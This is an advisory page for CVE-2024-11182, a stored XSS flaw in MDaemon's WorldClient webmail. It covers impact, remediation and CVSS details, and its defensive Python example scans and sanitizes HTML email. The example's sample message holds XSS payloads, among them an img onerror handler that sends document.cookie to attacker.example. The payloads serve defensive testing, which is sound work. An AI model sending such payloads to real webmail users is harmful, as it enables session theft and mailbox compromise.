CVE-2024-11182 — MDaemon Email Server Cross-Site Scripting (XSS) Vulnerability

MDaemon Email Server WorldClient — Stored XSS via Malicious HTML Email Executes Arbitrary JavaScript in Victim's Browser

What is MDaemon Email Server?

MDaemon Email Server is a Windows-based email server used by small and medium-sized businesses and by government, defense, and critical-infrastructure organizations, with a notable installed base in Eastern Europe and Central Asia. WorldClient is its webmail interface, which lets users read, compose, and manage email from a browser. Because a mail server carries an organization's correspondence, a flaw in its webmail gives an attacker a quiet, persistent view into that correspondence without ever touching the server's operating system.

Overview

CVE-2024-11182 is a stored cross-site scripting (XSS) vulnerability in the WorldClient webmail interface of MDaemon Email Server. A remote, unauthenticated attacker sends a crafted HTML email; when the recipient opens it in WorldClient, JavaScript embedded in the message runs in the recipient's browser under the webmail origin. CVSS records Scope as Changed (S:C) because the vulnerable component (WorldClient's server-side rendering) and the impacted component (the victim's browser session) differ; in that origin the script can issue authenticated requests as the victim and, where cookies are not flagged HttpOnly, read session material directly. MDaemon fixed the flaw in version 24.5.1 in November 2024. CISA added it to the Known Exploited Vulnerabilities catalog on 2025-05-19, six months later, on evidence of active exploitation; the exploitation reported has been against government and defense organizations.

Affected Versions

Product               Vulnerable   Fixed
MDaemon Email Server  < 24.5.1     24.5.1

Technical Details

CWE-79 (Improper Neutralization of Input During Web Page Generation). WorldClient renders incoming HTML email in the browser and is responsible for sanitizing it first. The sanitization logic failed to filter or escape certain JavaScript-bearing HTML constructs (which ones is not stated here), so a message carrying them is stored in the mailbox unchanged and, each time the victim opens it in WorldClient, the embedded script runs in the victim's browser within the origin of the WorldClient site. This is stored rather than reflected XSS: the payload persists with the message and needs no further action from the attacker once it is delivered.

Script running in the webmail origin can read the victim's session cookies and tokens where those are exposed to JavaScript (account takeover without the password), read and exfiltrate mailbox contents through WorldClient's own requests, send mail as the victim, change mailbox settings, and stage further phishing under the victim's trusted identity. An HttpOnly flag on the session cookie keeps document.cookie from yielding it, but it does not stop the script from driving WorldClient with the victim's ambient session, so cookie flags narrow the impact without removing it. The attack needs the victim to open the message while logged in (hence UI:R); beyond that, no credentials or attachment are required.

The Scope Changed (S:C) component of the CVSS vector captures that boundary crossing: the vulnerable component is the server-side WorldClient code that failed to neutralize the HTML, while the damage occurs in a different component, the victim's authenticated browser session, where attacker-supplied content from an untrusted email gains the privileges of the web application's origin.

Discovery

Identified and reported to MDaemon by security researchers. The six months between the patch (November 2024) and the KEV listing (May 2025) do not mean exploitation started late; they mean evidence of it surfaced late. A stored XSS in a government webmail system suits low-noise, long-running collection of correspondence rather than visible data theft, which is why intrusions of this kind tend to become known well after the fix ships.

Exploitation Context

MDaemon's installed base in Eastern European government networks makes it a target for Russian-nexus APT groups (APT28, Turla, Sandworm) that routinely go after government email infrastructure in Ukraine and neighbouring states. A stored XSS in a widely used government webmail system gives them persistent collection of internal communications with a minimal footprint: the attacker sends one crafted message, every official who opens it in WorldClient runs the payload, and because the payload lives in the mailbox it runs again on every re-read until the message is deleted or the server is patched.

Remediation

  1. Upgrade MDaemon Email Server to 24.5.1 or later now; the update is on the MDaemon downloads page. The fix lives on the server, so a malicious message already sitting in a mailbox is neutralized when a patched server renders it; no client-side setting substitutes for the upgrade.
  2. Review WorldClient access logs from November 2024 onward for sessions whose behaviour changes after a message is opened: bulk message reads, folder enumeration, mail sent that the user did not write, and changes to forwarding, password or two-factor settings. Search the message store for HTML bodies carrying script tags, on* event-handler attributes or javascript: URLs, and treat any hit as a lead on which users and sessions to examine.
  3. Keep WorldClient on HTTPS with HSTS as baseline hygiene, but do not count it as a mitigation for this bug: the script runs inside the legitimate origin over the same TLS session. HttpOnly and SameSite cookie attributes likewise limit what the script can read, not what it can do with the victim's session.
  4. Configure MDaemon's HTML email sanitization settings to the most restrictive mode, and consider delivering plain text only to users who do not need HTML rendering; this shrinks the attack surface but is not a substitute for the patch.
  5. Enable MDaemon's built-in spam and content filtering to block messages with suspicious HTML constructs at the gateway, accepting that gateway filters, like the sanitizer that failed here, can only block constructs they anticipate.
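The sanitization flaw described under Technical Details and the mailbox review in remediation step 2 both come down to recognizing HTML that can carry script. The Python below is an added example: it is not MDaemon's code, and it does not reproduce the construct actually used against WorldClient, which this page does not give. It places a blocklist-style filter of the kind that produces CWE-79 bugs beside an allowlist sanitizer built on the standard library's html.parser, then walks a constructed RFC 822 message, decodes its text/html part and lists every construct that would execute if rendered as-is. The message, the addresses and attacker.example are constructed placeholders, not indicators.

```python
"""Added example, not MDaemon's code nor the construct used against WorldClient: a blocklist
filter beside an allowlist sanitizer, and a scanner run over a constructed RFC 822 message."""
import re
from email import message_from_bytes, policy
from email.message import EmailMessage
from html import escape
from html.parser import HTMLParser

SCRIPT_TAGS = {"script", "iframe", "object", "embed", "svg", "base", "link", "meta"}  # load script alone
URL_ATTRS = {"href", "src", "action", "formaction", "srcdoc", "data", "xlink:href"}  # javascript:/data:
ALLOWED_TAGS = {"p", "br", "b", "i", "em", "strong", "a", "img", "ul", "ol", "li", "div", "span", "blockquote"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt", "width", "height"}}  # per allowed tag
SAFE_URL = re.compile(r"^(https?:|mailto:|cid:|#|/)", re.I)  # only these schemes survive in href/src

def naive_blocklist_sanitize(html):
    """The pattern behind many CWE-79 filters: strip <script> blocks and stop there."""
    return re.sub(r"<script\b[^>]*>.*?</script\s*>", "", html, flags=re.I | re.S)

def attr_is_dangerous(name, value):
    """True if the attribute can execute script whatever element carries it."""
    value = value or ""  # HTMLParser yields None for bare attributes
    if name.startswith("on") or name == "srcdoc":  # event handlers, embedded documents
        return True
    if name in URL_ATTRS:  # strip whitespace/control chars used to evade ("java\tscript:")
        compact = re.sub(r"[\s\x00-\x1f]", "", value).lower()
        return compact.startswith(("javascript:", "vbscript:", "data:"))
    return False

class ScriptFinder(HTMLParser):
    """Records every construct that would execute script if this HTML were rendered as-is."""
    def __init__(self):
        super().__init__()
        self.findings = []
    def handle_starttag(self, tag, attrs):
        if tag in SCRIPT_TAGS:
            self.findings.append(f"tag <{tag}>")
        for name, value in attrs:
            if attr_is_dangerous(name, value):
                self.findings.append(f"<{tag} {name}={value!r}>")

class AllowlistSanitizer(HTMLParser):
    """Rebuilds the document from scratch, emitting only allowlisted tags and attributes."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.discard_depth = [], 0  # depth > 0 while inside <script>/<style>
    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):  # their text content is discarded too, not just the tags
            self.discard_depth += 1
            return
        if tag not in ALLOWED_TAGS:
            return  # unknown element is dropped; its text content is kept
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, ()) or attr_is_dangerous(name, value):
                continue
            if name in URL_ATTRS and not SAFE_URL.match((value or "").strip()):
                continue
            kept.append(f' {name}="{escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.discard_depth = max(0, self.discard_depth - 1)
        elif tag in ALLOWED_TAGS:
            self.out.append(f"</{tag}>")
    def handle_data(self, data):
        if not self.discard_depth:
            self.out.append(escape(data, quote=False))  # text is re-escaped on output

def sanitize(html):
    s = AllowlistSanitizer()
    s.feed(html)
    s.close()
    return "".join(s.out)

def scan_message(raw_message):
    """Decode every text/html part of an RFC 822 message; list its script-bearing constructs."""
    findings = []
    for part in message_from_bytes(raw_message, policy=policy.default).walk():
        if part.get_content_type() == "text/html":
            finder = ScriptFinder()
            finder.feed(part.get_content())  # get_content() undoes base64/QP and the charset
            finder.close()
            findings.extend(finder.findings)
    return findings

# Constructed sample: each line after the greeting is a different way HTML can carry script.
SAMPLE_HTML = """<html><body>
<p>Hello, please review the <b>agenda</b> for Monday.</p>
<script>alert(document.domain)</script>
<img src="x" onerror="fetch('https://attacker.example/c?'+document.cookie)">
<a href="javascript:alert(document.domain)">meeting link</a>
<a href="https://example.gov/agenda">agenda on the intranet</a>
<svg onload="alert(document.domain)"></svg>
</body></html>"""

def build_sample_message():
    """Constructed multipart/alternative message carrying SAMPLE_HTML as its HTML part."""
    msg = EmailMessage()
    msg["From"], msg["To"], msg["Subject"] = "sender@example.org", "official@example.gov", "Agenda"
    msg.set_content("Please review the agenda for Monday.")
    msg.add_alternative(SAMPLE_HTML, subtype="html")
    return msg.as_bytes()
```

On the sample, the blocklist filter removes the script element and passes the onerror handler, the javascript: link and the svg onload untouched; the allowlist sanitizer keeps the paragraph and the https link and emits nothing for the rest, because it enumerates what is acceptable instead of what is bad, which is the shape of fix a sanitizer bug like this one needs. To hunt in a real store, feed scan_message() the raw RFC 822 files from the server's mailbox directories (the on-disk layout is an assumption about the deployment, not something this page documents); anything flagged in mail received since November 2024 is a lead on which user's session to examine next.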

Key Details

Property              Value
CVE ID                CVE-2024-11182
Vendor / Product      MDaemon — Email Server
NVD Published         2024-11-15
NVD Last Modified     2025-10-30
CVSS 3.1 Score        6.1
CVSS 3.1 Vector       CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Severity              MEDIUM
CWE                   CWE-79
CISA KEV Added        2025-05-19
CISA KEV Deadline     2025-06-09
Known Ransomware Use  No

CVSS 3.1 Breakdown

Attack Vector         Network
Attack Complexity     Low
Privileges Required   None
User Interaction      Required
Scope                 Changed
Confidentiality       Low
Integrity             Low
Availability          None

Required Action

CISA BOD 22-01 Deadline: 2025-06-09. Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.

Timeline

Date        Event
2024-11-14  MDaemon releases version 24.5.1 patching CVE-2024-11182
2024-11-15  CVE published
2025-05-19  Added to CISA Known Exploited Vulnerabilities catalog, six months after the patch
2025-06-09  CISA BOD 22-01 remediation deadline

References

Resource                                    Type
MDaemon Critical Updates — CVE-2024-11182   Vendor Advisory
NVD — CVE-2024-11182                        Vulnerability Database
CISA KEV Catalog Entry                      US Government